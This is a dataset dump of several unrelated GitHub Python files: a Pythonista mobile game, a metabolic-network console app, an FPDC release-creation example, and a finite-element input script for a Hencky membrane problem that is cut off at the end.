sys\n\ndef typewriter(text):\n for char in text:\n sys.stdout.write(char)\n sys.stdout.flush()\n if text != \"\\n\":\n time.sleep(0.1)\n else:\n time.sleep(1)","repo_name":"muhammadzaki693/zaky","sub_path":"zaki_project/zaki/usl.py","file_name":"usl.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15377144721","text":"# Import the supporting functions and classes\nengine = 'ista'\nfrom scene import *\nimport motion\nimport ui\nimport scene_drawing\nimport sound\nimport numpy as np\nfrom drubbleFunc import *\n\n# Window size\nwidth = max(get_screen_size())\nheight = min(get_screen_size())\n\ndef makeSplashScreen(obj):\n if gs.showedSplash:\n obj.background_color = skyBlue\n image(splash, 0, 0, width, height)\n else:\n k = float(obj.kSplash) / 255.0\n obj.background_color = (skyBlue[0] * k, skyBlue[1] * k, skyBlue[2] * k)\n image(splash, 0, 0, width, height)\n if k >= 1:\n gs.showedSplash = True\n\n\ndef linePlot(x, y, m2p, po, w, h, clr, wgt):\n x, y = xy2p(x, y, m2p, po, w, h)\n stroke(clr)\n stroke_weight(wgt)\n for k in range(1, np.size(x)):\n line(x[k - 1], y[k - 1], x[k], y[k])\n\n\ndef initStick(self, alph, sz, ap, ps):\n Stick = SpriteNode('a/crossHair.png', parent=self)\n Stick.size = (sz, sz)\n Stick.anchor_point = ap\n Stick.position = ps\n Stick.x = (ps[0] - ap[0] * sz, ps[0] + (1 - ap[0]) * sz)\n Stick.y = (ps[1] - ap[1] * sz, ps[1] + (1 - ap[1]) * sz)\n Stick.cntr = ((Stick.x[0] + Stick.x[1]) / 2, (Stick.y[0] + Stick.y[1]) / 2)\n Stick.ctrl = (0, 0)\n Stick.id = None\n\n Aura = SpriteNode('shp:Circle')\n # Aura = ShapeNode(circle,'white')\n # circle = ui.Path.oval (0, 0, 0.5*sz,0.5*sz)\n Aura.size = (0.5 * sz, 0.5 * sz)\n Aura.position = Stick.cntr\n return Stick, Aura\n\n\ndef touchStick(loc, stick):\n tCnd = [loc[0] > stick.x[0],\n loc[0] < stick.x[1],\n loc[1] > stick.y[0],\n loc[1] < stick.y[1]]\n\n # Touched inside the stick\n if all(tCnd):\n x = min(max(p.tsens * (2 * (loc[0] - stick.x[0]) / stick.size[0] - 1), -1), 1)\n y = min(max(p.tsens * (2 * (loc[1] - stick.y[0]) / stick.size[1] - 1), -1), 1)\n\n #mag = np.sqrt(x ** 2 + y ** 2)\n #ang = np.around(4 * np.arctan2(y, x) / np.pi) * np.pi / 4\n\n #return (mag * np.cos(ang), mag * np.sin(ang))\n return x, y\n else:\n return (0, 0)\n\n\ndef toggleVisibleSprites(self, boule):\n if boule:\n self.moveStick.alpha = 0.5\n self.moveAura.alpha = 0.5\n self.tiltStick.alpha = 0.5\n self.tiltAura.alpha = 0.5\n self.add_child(self.ball)\n self.add_child(self.head)\n self.add_child(self.stool)\n if p.nPlayer > 1:\n self.add_child(self.head1)\n self.add_child(self.stool1)\n self.time_label.alpha = 1\n self.dist_label.alpha = 1\n self.high_label.alpha = 1\n self.boing_label.alpha = 1\n self.score_label.alpha = 1\n self.actionButt.add()\n self.option_butt.add()\n else:\n self.moveStick.alpha = 0\n self.moveAura.alpha = 0\n self.tiltStick.alpha = 0\n self.tiltAura.alpha = 0\n self.ball.remove_from_parent()\n self.head.remove_from_parent()\n self.head1.remove_from_parent()\n self.stool.remove_from_parent()\n self.stool1.remove_from_parent()\n self.time_label.alpha = 0\n self.dist_label.alpha = 0\n self.high_label.alpha = 0\n self.boing_label.alpha = 0\n self.score_label.alpha = 0\n self.actionButt.rm()\n self.option_butt.rm()\n\ndef makeMarkers(xrng, m2p, po):\n\n xrng_r = np.around(xrng, -1)\n xrng_n = int((xrng_r[1] - xrng_r[0]) / 10.0) + 1\n for k in range(0, xrng_n):\n xr = xrng_r[0] + 10 * k\n\n [start_x, start_y] = xy2p(xr, 0, m2p, po, width, height)\n [end_x, end_y] = xy2p(xr, -1, m2p, po, width, height)\n stroke(white)\n stroke_weight(1)\n line(start_x, start_y, end_x, end_y)\n fsize = min(24, int(m2p))\n text(str(int(xr)), font_name=p.MacsFavoriteFont, font_size=fsize, x=start_x - 2,\n y=start_y + m2p / 20.0, alignment=1)\n\n\n# Set the keyboard input and mouse defaults\nkeyPush = np.zeros(8)\n\n# Initialize gamestate\ngs = GameState(p.u0, engine)\n\n# Initialize stats\nstats = GameScore()\n\n# Initialize drums\ndrums = DrumBeat()\ndrum_player = [sound.Player(drums.loop[k]) for k in range(drums.nloops)]\n\nclass MyBackground:\n # Size of the black bar on the bottom of the screen\n bottomLineHeight = height / 20.0\n\n # Set size of the background, before updates\n sz_orig = w_orig, h_orig = (2400.0, 400.0)\n\n # Number of background images\n num_bg = 3\n\n # Import the background images\n bg = []\n for n in range(num_bg):\n name = 'a/bg' + str(n) + '.png'\n bg.append(scene_drawing.load_image_file(name))\n\n # Randomize the start location in the background\n xpos = np.random.rand() * 100.0 * num_bg\n\n def __init__(self, **kwargs):\n super(MyBackground, self).__init__(**kwargs)\n\n self.width = width\n self.height = height\n\n def update(self, x, y, w, h, m2p): \n # xmod is normalized position of the player between 0 and num_bg\n xmod = np.mod(x+self.xpos, 100.0*self.num_bg)/100.0\n xrem = np.mod(xmod, 1)\n xflr = int(np.floor(xmod))\n\n # xsel selects which background textures are used TBR\n if xrem <= 0.5:\n xsel = xflr - 1\n else:\n xsel = xflr\n\n # scf is the scale factor to apply to the background\n scf = (m2p / 70.0) ** 0.5\n img_w = int(np.around(self.w_orig * scf))\n img_h = int(np.around(self.h_orig * scf))\n\n # Decide which textures are used\n idx_left = xsel\n if xsel < (self.num_bg - 1):\n idx_right = xsel + 1\n else:\n idx_right = 0\n\n # Determine where the edge is located\n if xrem <= 0.5:\n # Player is in the right frame\n edge = int(np.around(w / 2.0 - xrem * img_w))\n else:\n # Player is in the left frame\n edge = int(np.around(w / 2.0 + (1.0 - xrem) * img_w))\n\n # Position the textures\n overlap = 0.0\n bg_left0 = edge - (1 - overlap) * img_w\n bg_left1 = edge - overlap * img_w\n\n # Draw the textures\n scene_drawing.image(self.bg[idx_left], bg_left0, self.bottomLineHeight, img_w, img_h)\n scene_drawing.image(self.bg[idx_right], bg_left1, self.bottomLineHeight, img_w, img_h)\n\n\n# Create OptionButtons class\nclass OptionButtons:\n def __init__(self, anchor_point=(0.5, 0.5), rm_pos=(0, 1.1*height), **kwargs):\n # Get the keyword arguments\n text = kwargs['text']\n font = kwargs['font']\n self.pos = kwargs['position']\n self.rm_pos = rm_pos\n self.sz = kwargs['size']\n ap = anchor_point\n \n # Set the boundaries\n self.left = self.pos[0] - self.sz[0] * ap[0]\n self.right = self.pos[0] + self.sz[0] * (1-ap[0])\n self.bottom = self.pos[1] - self.sz[1] * ap[1]\n self.top = self.pos[1] + self.sz[1] * (1-ap[1])\n \n # Set up the background image\n self.img = SpriteNode('a/button.png')\n self.img.position = (self.rm_pos[0], self.rm_pos[1])\n self.img.size = self.sz\n self.img.alpha = 0.5\n self.img.anchor_point = (0, 0)\n \n # Set up the text\n self.butt = LabelNode(text=text, font=font, color=red)\n self.butt.position = (self.rm_pos[0] + self.sz[0]/2, self.rm_pos[1] + self.sz[1]/2)\n self.butt.anchor_point = (0.5, 0.5)\n \n def text(self, str):\n self.butt.text = str\n \n def detect_touch(self, loc):\n tCnd = [loc[0] > self.left,\n loc[0] < self.right,\n loc[1] > self.bottom,\n loc[1] < self.top]\n return all(tCnd)\n \n def add(self, t=0.5):\n move_action = Action.move_to(self.left, self.bottom, t, TIMING_SINODIAL)\n self.img.run_action(move_action)\n move_action = Action.move_to(self.left + self.sz[0]/2, self.bottom + self.sz[1]/2, t, TIMING_SINODIAL)\n self.butt.run_action(move_action)\n \n def rm(self, t=0.5):\n move_action = Action.move_to(self.rm_pos[0], self.rm_pos[1], t, TIMING_SINODIAL)\n self.img.run_action(move_action)\n move_action = Action.move_to(self.rm_pos[0] + self.sz[0]/2, self.rm_pos[1] + self.sz[1]/2, t, TIMING_SINODIAL)\n self.butt.run_action(move_action)\n\nif engine == 'ista':\n \n class Game (Scene):\n def setup(self):\n\n # Initialize the motion module\n motion.start_updates()\n\n # Add the game state classes to the scene\n self.touchCycle = False\n \n # Initialize the counter for the splash screen\n self.kSplash = 0\n self.splash = SpriteNode('a/splash.png')\n self.splash.size = (width, height)\n self.splash.anchor_point = (0.0, 0.0)\n self.splash.position = (0, 0)\n self.add_child(self.splash)\n self.splash.alpha = 0\n fade_action = Action.fade_to(1, 2)\n self.splash.run_action(fade_action)\n \n # Generate the sky blue background and images\n self.background_color = skyBlue\n self.bg = MyBackground() \n \n # Initialize the buttons or sticks\n self.moveStick,self.moveAura = initStick(self,0.1,0.2*width,(1,0),(width,height/20))\n self.tiltStick,self.tiltAura = initStick(self,0.1,0.2*width,(0,0),(0,height/20))\n self.add_child(self.moveAura)\n self.add_child(self.tiltAura)\n \n # Initialize the score line\n score_font = ('Menlo', 11)\n self.time_label = LabelNode('Time', score_font, parent=self,color=white)\n self.time_label.anchor_point = (0.0, 1.0)\n self.time_label.position = (width*0.01, height - 2)\n self.time_label.z_position = 1\n \n self.dist_label = LabelNode('Distance', score_font, parent=self, color=white)\n self.dist_label.anchor_point = (0.0, 1.0)\n self.dist_label.position = (width*0.21, height - 2)\n self.dist_label.z_position = 1\n \n self.high_label = LabelNode('Height', score_font, parent=self,color=white)\n self.high_label.anchor_point = (0.0, 1.0)\n self.high_label.position = (width*0.42, height - 2)\n self.high_label.z_position = 1\n \n self.boing_label = LabelNode('Boing!', score_font, parent=self,color=white)\n self.boing_label.anchor_point = (0.0, 1.0)\n self.boing_label.position = (width*0.62, height - 2)\n self.boing_label.z_position = 1\n \n self.score_label = LabelNode('Score', score_font, parent=self,color=white)\n self.score_label.anchor_point = (0.0, 1.0)\n self.score_label.position = (width*0.82, height - 2)\n self.score_label.z_position = 1\n \n # Get ranges for drawing the player and ball\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n \n # Initialize the ball image\n self.ball = SpriteNode('a/ball.png')\n dbPix = 2*p.rb*m2p\n self.ball.size = (dbPix, dbPix)\n self.ball.anchor_point = (0.5, 0.5)\n self.ball.position = (gs.xb*m2p+po, (gs.yb+p.rb)*m2p)\n \n # Initialize the player's head\n self.head = SpriteNode('a/myFace.png')\n spPix = 0.7*m2p\n self.head.size = (spPix, spPix)\n self.head.anchor_point = (0.5, 0.0)\n self.head.position = (gs.xp[0]*m2p+po, (gs.yp[0]+p.d)*m2p)\n \n self.head1 = SpriteNode('a/LadyFace.png')\n self.head1.size = (spPix, spPix)\n self.head1.anchor_point = (0.5, 0.0)\n self.head.position = (gs.xp[1]*m2p+po, (gs.yp[1]+p.d)*m2p)\n\n # Initialize Stools\n self.stool = SpriteNode('a/stool.png')\n self.stool.size = (0.7*m2p, m2p)\n self.stool.position = (gs.xp[0]*m2p+po, (gs.yp[0]+p.d)*m2p)\n self.stool.anchor_point = (0.5, 1.0)\n \n self.stool1 = SpriteNode('a/stool.png', color=gray)\n self.stool1.size = (0.7*m2p, m2p)\n self.stool1.position = (gs.xp[1]*m2p+po, (gs.yp[1]+p.d)*m2p)\n self.stool1.anchor_point = (0.5, 1.0)\n\n # Initialize Buttons\n self.actionButt = OptionButtons(text='Begin', font=(p.MacsFavoriteFont, 20), position=(0.99*width, 0.92*height), size=(0.18 * width, 0.04 * width), anchor_point=(1,1))\n \n self.option_butt = OptionButtons(text='Options', font=(p.MacsFavoriteFont, 20), position=(0.01*width,0.92*height), size=(0.18 * width, 0.04 * width), anchor_point=(0,1))\n \n self.add_child(self.actionButt.butt)\n self.add_child(self.actionButt.img)\n self.add_child(self.option_butt.butt)\n self.add_child(self.option_butt.img)\n self.actionButt.text('Begin')\n \n self.singleButt = OptionButtons(text='Single Drubble', font=(p.MacsFavoriteFont,36), size=(0.8*width,0.2*height), position=(0.5*width, 0.75*height), rm_pos=(-1.5*width, 0.75*height))\n self.doubleButt = OptionButtons(text='Double Drubble', font=(p.MacsFavoriteFont,36), size=(0.8*width,0.2*height), position=(0.5*width, 0.5*height), rm_pos=(1.5*width, 0.5*height))\n \n self.add_child(self.singleButt.butt)\n self.add_child(self.singleButt.img)\n self.add_child(self.doubleButt.butt)\n self.add_child(self.doubleButt.img)\n \n toggleVisibleSprites(self, False)\n\n # Start the drums\n self.current_drum = 0\n drum_player[self.current_drum].play()\n \n def update(self):\n # Update if there was a touch\n if self.touchCycle:\n cycleModes(gs, stats, engine)\n if gs.game_mode == 2:\n self.singleButt.add()\n self.doubleButt.add()\n \n if gs.game_mode == 3:\n self.singleButt.rm()\n self.doubleButt.rm()\n toggleVisibleSprites(self,True)\n \n \n if gs.game_mode == 4:\n self.actionButt.text('Set Angle')\n \n if gs.game_mode == 5:\n self.actionButt.text('Set Speed')\n \n if gs.game_mode == 6:\n self.actionButt.text('Restart')\n \n self.touchCycle = False\n \n # Get control inputs\n if gs.ctrlMode == 'motion':\n gs.setControl(g=motion.get_gravity(), a=motion.get_user_acceleration()) \n elif gs.ctrlMode == 'vStick' and gs.game_mode>1:\n gs.setControl(moveStick=self.moveStick.ctrl,\n tiltStick=self.tiltStick.ctrl)\n \n # Move auras\n xy = self.moveStick.ctrl\n c = self.moveStick.cntr\n s = self.moveStick.size[0]/3\n self.moveAura.position = (c[0]+xy[0]*s,c[1]+xy[1]*s)\n xy = self.tiltStick.ctrl\n c = self.tiltStick.cntr\n self.tiltAura.position = (c[0]+xy[0]*s,c[1]+xy[1]*s)\n \n ## ANGLE AND SPEED SETTINGS\n if gs.game_mode>2 and gs.game_mode<6:\n gs.setAngleSpeed()\n \n # Run one simulation step\n gs.simStep(p, gs, stats)\n if gs.game_mode == 6:\n stats.update(gs)\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n if gs.StoolBounce:\n sound.play_effect('digital:PhaseJump3')\n if gs.FloorBounce and not gs.Stuck:\n sound.play_effect('game:Error')\n \n # Play the drum beat\n if drum_player[self.current_drum].current_time > 0.985 * drum_player[self.current_drum].duration:\n next_drum = 1\n if next_drum == self.current_drum:\n drum_player[self.current_drum].current_time = 0.0\n else:\n self.current_drum = next_drum\n drum_player[self.current_drum].play()\n #drums.play_ista()\n \n # Update score line\n self.time_label.text = 'Time - %10.1f' % gs.t\n self.dist_label.text = 'Distance - %6.1f' % stats.stoolDist\n self.high_label.text = 'Height - %8.2f' % stats.maxHeight\n self.boing_label.text = 'Boing! - %6.0f' % stats.stoolCount\n self.score_label.text = 'Score - %9.0f' % stats.score\n \n # update the ball sprites\n dbPix = 2*p.rb*m2p\n self.ball.size = (dbPix, dbPix)\n x,y = xy2p(gs.xb, gs.yb, m2p, po, width, height)\n self.ball.position = (x, y)\n \n # Update the head and stool sprites\n spPix = 0.7*m2p\n self.head.size = (spPix, spPix)\n x,y = xy2p(gs.xp[0], gs.yp[0]+p.d, m2p, po, width, height)\n self.head.position = (x, y)\n \n self.stool.size = (0.7*m2p, m2p)\n x,y = xy2p(gs.xp[0] - gs.lp[0] * np.sin(gs.tp[0]), gs.yp[0]+p.d + gs.lp[0] * np.cos(gs.tp[0]), m2p, po, width, height)\n self.stool.position = (x, y)\n self.stool.rotation = gs.tp[0]\n \n if p.nPlayer > 1:\n self.head1.size = (spPix,spPix)\n x,y = xy2p(gs.xp[1], gs.yp[1]+p.d, m2p, po, width, height)\n self.head1.position = (x,y)\n \n self.stool1.size = (0.7*m2p, m2p)\n x,y = xy2p(gs.xp[1] - gs.lp[1] * np.sin(gs.tp[1]), gs.yp[1]+p.d + gs.lp[1] * np.cos(gs.tp[1]), m2p, po, width, height)\n self.stool1.position = (x, y)\n self.stool1.rotation = gs.tp[1]\n \n def draw(self):\n # Show the splash screen\n if gs.game_mode == 1:\n #makeSplashScreen(self)\n if not gs.showedSplash:\n self.kSplash += 2\n else:\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n \n # Generate the background\n if gs.game_mode>2:\n # Update the background\n xMean = (gs.xb+gs.xp[0])/2.0\n self.bg.update(xMean,gs.yb,width,height,m2p)\n \n if gs.game_mode>2:\n # Generate the bottom line\n stroke(black)\n stroke_weight(height/20)\n line(0,height/40,width,height/40)\n \n # Generate the markers\n makeMarkers(xrng,m2p,po)\n \n # Generate the trajectory\n linePlot(gs.xTraj,gs.yTraj,m2p,po,width,height,white,1)\n \n for k in range(p.nPlayer):\n # Generate a player image\n xv,yv,sx,sy = stickDude(gs,k)\n linePlot(xv,yv,m2p,po,width,height,p.playerColor[k],0.15*m2p)\n \n # Generate a stool image\n #linePlot(sx,sy,m2p,po,width,height,p.stoolColor[k],0.1*m2p)\n \n def touch_began(self, touch):\n # Reset if necessary\n if gs.game_mode == 1 and self.kSplash >= 255:\n self.touchCycle = True\n move_action = Action.move_to(0, -height, 0.5, TIMING_SINODIAL)\n self.splash.run_action(move_action)\n \n if gs.game_mode == 2:\n b1 = self.singleButt.detect_touch(touch.location)\n b2 = self.doubleButt.detect_touch(touch.location)\n if b1 or b2:\n self.touchCycle = True\n p.nPlayer = b1 + 2*b2\n self.singleButt.rm()\n self.doubleButt.rm()\n \n if gs.game_mode > 2 and self.actionButt.detect_touch(touch.location):\n self.touchCycle = True\n \n if gs.game_mode > 2 and self.option_butt.detect_touch(touch.location):\n gs.game_mode = 1\n toggleVisibleSprites(self,False)\n self.touchCycle = True\n \n # Detect control inputs\n xy = touchStick(touch.location,self.moveStick)\n if xy[0] != 0:\n \tself.moveStick.ctrl = xy\n \tself.moveStick.id = touch.touch_id\n \tself.moveAura.alpha = 1\n \t\n xy = touchStick(touch.location,self.tiltStick)\n if xy[0] != 0:\n \tself.tiltStick.ctrl = xy\n \tself.tiltStick.id = touch.touch_id\t\n \tself.tiltAura.alpha = 1\n \n def touch_moved(self,touch):\n # Detect control inputs\n xy = touchStick(touch.location,self.moveStick)\n if touch.touch_id == self.moveStick.id and xy[0] != 0:\n self.moveStick.ctrl = xy\n \n xy = touchStick(touch.location,self.tiltStick)\n if touch.touch_id == self.tiltStick.id and xy[0] != 0:\n self.tiltStick.ctrl = xy\n \n \n def touch_ended(self,touch):\n if touch.touch_id == self.moveStick.id:\n self.moveStick.ctrl = (0,0)\n self.moveAura.alpha = 0.5\n \n if touch.touch_id == self.tiltStick.id:\n self.tiltStick.ctrl = (0,0)\n self.tiltAura.alpha = 0.5\n \n def stop(self):\n motion.stop_updates()\n \n if __name__ == '__main__':\n run(Game(), LANDSCAPE, frame_interval=60.0/fs,show_fps=False)\n \n \n \n \n","repo_name":"radcli14/drubble","sub_path":"obsolete/dRuBbLe.py","file_name":"dRuBbLe.py","file_ext":"py","file_size_in_byte":21988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2479081703","text":"from application import RunMetabolicalNetworkController\r\nfrom shared import InputOptions\r\nimport sys\r\n\r\n\r\n'''\r\n User interface with console mode.\r\n'''\r\n\r\ndef get_boolean(input_response):\r\n 'Check the input response and returns True/False.'\r\n return input_response in ['y', 'yes', 'Y', '', None]\r\n\r\ndef get_options_from_user():\r\n 'Shows the functionalities to the user and get their response.'\r\n\r\n options = {}\r\n\r\n tmp = input(\"Please insert the absolute path of the network file: \")\r\n options[InputOptions.FILEPATH] = get_sanitized_string(tmp)\r\n\r\n tmp = input(\"Topological analysis [Y|n]? \")\r\n options[InputOptions.TOPOLOGICAL_ANALYSIS] = get_boolean(tmp)\r\n\r\n tmp = input(\"Graphical visualization of metabolic network [Y|n]? \")\r\n options[InputOptions.GRAPHIC_VISUALIZATION] = get_boolean(tmp)\r\n\r\n tmp = input(\"Number of reactions and metabolites [Y|n]? \")\r\n options[InputOptions.NUMBER_REACT_MET] = get_boolean(tmp)\r\n\r\n tmp = input(\"Final metabolites produced by metabolit network [Y|n]? \")\r\n options[InputOptions.FINAL_METABOLITES] = get_boolean(tmp)\r\n\r\n tmp = input(\"Please insert a metabolites (splitted by space) to return all reactions activated: \")\r\n options[InputOptions.ALL_REACTIONS] = put_elements_in_list(tmp)\r\n\r\n tmp = input(\"Five frequent metabolites [Y|n]? \")\r\n options[InputOptions.TOP5_METABOLITES] = get_boolean(tmp)\r\n\r\n tmp = input(\"Please insert a metabolites (splitted by space) to return all metabolites excreted: \")\r\n options[InputOptions.ALL_PRODUCTS] = put_elements_in_list(tmp)\r\n\r\n tmp = input(\"Automatic generation of metabolic network [Y|n]? \") \r\n options[InputOptions.AUTO_GENERATION] = get_boolean(tmp)\r\n if options[InputOptions.AUTO_GENERATION]:\r\n tmp = input(\"Please provide the pathway (KEGG pathway code): \")\r\n options[InputOptions.AUTO_GENERATION_PATHWAY] = get_sanitized_string(tmp)\r\n\r\n return options\r\n\r\ndef get_mock_options():\r\n 'Returns the default response to testing the program.'\r\n\r\n return {\r\n InputOptions.FILEPATH: 'example-net.txt',\r\n InputOptions.TOPOLOGICAL_ANALYSIS: True,\r\n InputOptions.GRAPHIC_VISUALIZATION: False,\r\n InputOptions.NUMBER_REACT_MET: True,\r\n InputOptions.FINAL_METABOLITES: True,\r\n InputOptions.ALL_REACTIONS: [],\r\n InputOptions.TOP5_METABOLITES: True,\r\n InputOptions.ALL_PRODUCTS: [],\r\n InputOptions.AUTO_GENERATION: False,\r\n InputOptions.AUTO_GENERATION_PATHWAY: \"map00061\"\r\n }\r\n\r\ndef put_elements_in_list(input_response):\r\n 'Retrieves the input response and puts it in a list.'\r\n result = get_sanitized_string(input_response)\r\n if not result: \r\n return []\r\n\r\n return [element for element in result.split(\" \")]\r\n\r\ndef get_sanitized_string(input_response):\r\n 'Retrieves the input response.'\r\n\r\n return input_response.strip()\r\n\r\ndef show_welcome_message():\r\n 'Prints the welcome message.'\r\n\r\n print(\"Welcome to MetNet app!\\n\")\r\n\r\ndef show_goodbye_message():\r\n 'Prints the final message.'\r\n\r\n print(\"Thanks for using this app!\")\r\n\r\ndef show_results_message():\r\n 'Prints the results message.'\r\n print(\"Results: \\n\")\r\n\r\ndef show_result(prompt, result, new_line=False, is_list=False):\r\n 'Prints results of each functionality.'\r\n\r\n if result:\r\n if new_line:\r\n print(prompt)\r\n print(str(result))\r\n\r\n if is_list:\r\n print(prompt, \" \".join(str(element) for element in result), \"\\n\")\r\n\r\n else:\r\n print(prompt, str(result), \"\\n\")\r\n \r\ndef run():\r\n 'Allows the interaction with the user in console mode. Shows the functionalities and their results.'\r\n\r\n show_welcome_message()\r\n\r\n if len(sys.argv) > 1 and sys.argv[1] == \"test\":\r\n options = get_mock_options()\r\n \r\n else:\r\n options = get_options_from_user()\r\n\r\n try:\r\n controller = RunMetabolicalNetworkController(options)\r\n controller.load_from_file()\r\n\r\n show_results_message()\r\n\r\n betweeness, closeness = controller.get_topological_analysis()\r\n show_result('Betweeness centrality: ', betweeness, is_list=True)\r\n show_result('Closeness centrality: ', closeness, is_list=True)\r\n \r\n result = controller.get_graphical_visualization()\r\n show_result(\"Graphical representation. \", result, new_line=True)\r\n\r\n result = controller.get_number_reactions_metabolites()\r\n show_result(\"Number of reactions: \", result[0])\r\n show_result(\"Number of metabolites: \", result[1])\r\n \r\n result = controller.get_final_metabolites()\r\n show_result(\"Final metabolites: \", result, is_list=True)\r\n\r\n result = controller.get_active_reactions()\r\n show_result(\"Active reactions: \", result, is_list=True)\r\n\r\n result = controller.get_top5_metabolites()\r\n show_result(\"Frequent metabolites: \", result, is_list=True)\r\n\r\n result = controller.get_metabolites_excreted()\r\n show_result(\"Metabolites excreted: \", result, is_list=True)\r\n\r\n result = controller.generate_metabolic_networks()\r\n show_result(\"Metabolic network generated. Please check the results.\", result)\r\n\r\n except Exception as e:\r\n print(\"There was an error: \", str(e))\r\n\r\n show_goodbye_message()","repo_name":"paty-oliveira/MetabolicNetwork","sub_path":"metnet/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69922953833","text":"from fpdc_client import FPDC, Release\n\nserver = FPDC(url=\"http://localhost:8000\")\nserver.connect()\n\n# Use oidc-register to get a client_secret.json file\nserver.login(auth_file=\"client_secrets.json\")\nnew_release = Release.create(\n {\n \"release_id\": \"fedora-42\",\n \"short\": \"f42\",\n \"version\": \"42\",\n \"name\": \"Fedora\",\n \"release_date\": \"2042-01-01\",\n \"eol_date\": \"2042-12-31\",\n \"sigkey\": \"towel\",\n }\n)\n\nreleases = Release.all()\nfor release in releases:\n print(release)\n","repo_name":"fedora-infra/fpdc","sub_path":"examples/create_release.py","file_name":"create_release.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"4329909302","text":"\"\"\"\nInput file for validation of PS, Hencky problem\n\"\"\"\nimport numpy as np\n\nfilename = 'hencky_mesh.msh' # mesh file\n\n# Matlab code to calculate value of b_0, as Python's sympy library is way too slow to calculate numeric values:\n\"\"\"\n clear all\n clc\n \n syms b_0\n mu = 0; % [-] Poisson's ratio\n eqn = 0 == (1-mu) * b_0 - (3-mu) / (b_0 ^ 2) - (5 - mu) * 2 / (3 * b_0 ^ 5) - (7 - mu) * 13 / (18 * b_0 ^ 8) - (9 - mu) * 17 / (18 * b_0 ^ 11) - (11 - mu) * 37 / (27 * b_0 ^ 14) - (13 - mu) * 1205 / (567 * b_0 ^ 17) - (15 - mu) * 219241 / (63504 * b_0 ^ 20) - (17 - mu) * 6634069 / (1143072 * b_0 ^ 23) - (19 - mu) * 51523763 / (5143824 * b_0 ^ 26) - (21 - mu) * 998796305 / (56582064 * b_0 ^ 29);\n sol = solve(eqn, b_0);\n \n numeric_sol = double(sol);\n tolerance = 1e-10; % Define a small tolerance\n real_solutions = numeric_sol(abs(imag(numeric_sol)) < tolerance)\n\"\"\"\n\n# precalculated values of b_0:\n# mu, b_0\n# 0.0, 1.6204\n# 0.1, 1.6487\n# 0.2, 1.6827\n# 0.3, 1.7244\n# 0.4, 1.7769\n\nb_0 = 1.6204\nr = 0.1425 # [m] radius circular membrane\np = 100 # [kPa] uniform transverse pressure\nE_t = 311488 # [N/m] Young's modules membrane material\nd = 0.01 # [m] Membrane thickness\n\nq = p*r/E_t\n\n# for n = 10, first 11 relations of the a_2n parameter\na0 = 1 / b_0\na2 = 1 / (2 * b_0 ** 4)\na4 = 5 / (9 * b_0 ** 7)\na6 = 55 / (72 * b_0 ** 10)\na8 = 7 / (6 * b_0 ** 13)\na10 = 205 / (108 * b_0 ** 16)\na12 = 17051 / (5292 * b_0 ** 19)\na14 = 2864485 / (508032 * b_0 ** 22)\na16 = 103863265 / (10287648 * b_0 ** 25)\na18 = 27047983 / (1469664 * b_0 ** 28)\na20 = 42367613873 / (1244805408 * b_0 ** 31)\na = [a0, a2, a4, a6, a8, a10, a12, a14, a16, a18, a20]\n\n\ndef analytical_solution(a_n, radius, loading_param):\n series = 0\n c = np.linspace(0, r, 16)\n w = []\n\n for coordinate in c:\n for i in range(0, 11):\n series += a_n[i] * (1 - (coordinate/radius) ** (2*i + 2))\n w.append(loading_param ** (1/3) * series)\n\n return w, c\n\n\ndef cm_and_ic(mesh_file, m, E, c):\n coordinates = []\n connections = []\n fixed = 20 # write automation later when I have more experience with the formatting of .msh files\n n = 0\n\n # read mesh file\n with open(mesh_file, 'r') as file:\n lines = file.readlines()\n\n for i, line in enumerate(lines):\n if line.startswith(\"$Nodes\"): # retrieve nodal coordinates\n entity_bloc, nodes_total, min_node_tag, max_node_tag = lines[i+1].split()\n n = int(nodes_total)\n total_lines = (int(entity_bloc) + int(nodes_total)) * 2 + 1\n for j in range(1, total_lines):\n if len(lines[i + j].split()) == 3:\n coordinate = lines[i + j].split()\n coordinates.append([float(coordinate[i]) for i in range(3)])\n\n if line.startswith(\"$Elements\"): # retrieve nodal connections\n entity_bloc, nodes_total, min_node_tag, max_node_tag = lines[i + 1].split()\n total_lines = int(entity_bloc) + int(nodes_total) + 2\n\n for j in range(1, total_lines):\n if len(lines[i + j].split()) != 4:\n connection = lines[i + j].split()\n connections.append([int(connection[i]) for i in range(1, len(connection))])\n\n i_c = [] # construct initial conditions matrix: [x, v, m, fixed]\n for i in range(n):\n if i < fixed:\n i_c.append([coordinates[i], [0, 0, 0], m, True])\n else:\n i_c.append([coordinates[i], [0, 0, 0], m, False])\n\n c_m = [] # construct connectivity matrix: [[index p1, index p2], ...]\n for element in connections:\n for i in range(len(element)):\n if i + 1 == len(element):\n c_m.append([element[i]-1, element[0]-1])\n else:\n c_m.append([element[i]-1, element[i+1]-1])\n c_m = list(set(tuple(sorted(pair)) for pair in c_m))\n c_m = [list(pair) for pair in c_m if pair[0] != pair[1]]\n\n e_p = [] # construct element parameter array: [k, l0, c]\n for nodes in c_m:\n node1, node2 = nodes[0], nodes[1]\n A = 0\n for element in connections:\n if node1+1 in element and node2+1 in element and len(element) > 2:\n p1 = np.array(i_c[element[0]-1][0])\n p2 = np.array(i_c[element[1]-1][0])\n p3 = np.array(i_c[element[2]-1][0])\n\n v1 = p2 - p1\n v2 = p3 - p2\n\n normal_vector = np.cross(v1, v2)\n area = np.linalg.norm(normal_vector) / 2.0\n A += 0.5*area\n l0 = np.linalg.norm(np.array(i_c[node1][0]) - np.array(i_c[node2][0]))\n A = np.sqrt(A)\n # A = A*d\n k = E*A/l0\n # print(k)\n e_p.append([k, l0, c])\n\n connections = np.array([connection for connection in connections if len(connection) == 4])-1\n return c_m, i_c, e_p, n, connections\n\n\n# dictionary of required parameters\nparams = {\n # model parameters\n \"n\": 10, # [-] number of particles\n \"k_t\": 1, # [N/m] spring stiffness\n \"c\": 1, # [N s/m] damping coefficient\n \"L\": 10, # [m] tether 